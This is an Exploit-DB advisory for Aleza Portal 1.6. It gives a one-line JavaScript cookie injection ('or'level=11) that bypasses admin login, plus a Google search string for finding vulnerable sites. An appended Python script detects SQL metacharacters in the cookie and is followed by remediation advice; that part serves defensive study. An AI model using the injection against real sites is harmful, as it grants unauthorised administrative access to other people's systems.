Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling

EDB-ID: 15144
CVE: N/A
Author: KnocKout
Type: webapps
Platform: Windows
Date: 2010-09-28

Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
=========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Exploitation ~~~~~~~~~~~

    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
          [+]  Exploitable Browser Injected!

          [+]   Go to : http://[Victim]/admin
          
      
      GoodLucK ;)
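
A detection check for the cookie described above, added here as an example that is not part of the original advisory or of Aleza Portal: it parses Cookie header values, splits the alezalogin cookie into its login and pass subkeys, and flags requests whose subkeys carry SQL metacharacters. The benign cookie format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample Cookie header values (not taken from real traffic).
# The benign format (plain login name, hex password hash) is an assumption.
SAMPLES = [
    "ASPSESSIONID=abc123; alezalogin=login=alice&pass=5f4dcc3b5aa765d61d8327deb882cf99",
    "alezalogin=login='or'level=11&pass='or'",           # value shown in the advisory
    "alezalogin=login=%27or%27level=11&pass=%27or%27",   # same value, URL-encoded
]

# Quotes, statement separators, comment markers and SQL keywords have no place
# in a login name or password hash; tune this to the real value format.
SUSPICIOUS = re.compile(r"[';]|--|/\*|\b(?:or|and|union|select)\b", re.IGNORECASE)

def parse_cookie_header(header):
    """Split a Cookie header into {name: raw_value}, cutting at the first '='."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def parse_subkeys(value):
    """Split a multi-value cookie (k1=v1&k2=v2) into URL-decoded subkeys."""
    subkeys = {}
    for pair in value.split("&"):
        key, sep, val = pair.partition("=")
        if sep:
            subkeys[unquote(key)] = unquote(val)
    return subkeys

def flag_request(cookie_header, cookie_name="alezalogin"):
    """Return the sorted subkey names whose decoded value looks like SQL."""
    raw = parse_cookie_header(cookie_header).get(cookie_name)
    if raw is None:
        return []
    return sorted(k for k, v in parse_subkeys(raw).items() if SUSPICIOUS.search(v))

if __name__ == "__main__":
    for line in SAMPLES:
        print(flag_request(line) or "clean", "<-", line)
```

Flagging only detects attempts; the fix on the server side is to bind cookie values as query parameters and to stop treating a client-supplied login/pass cookie as proof of authentication.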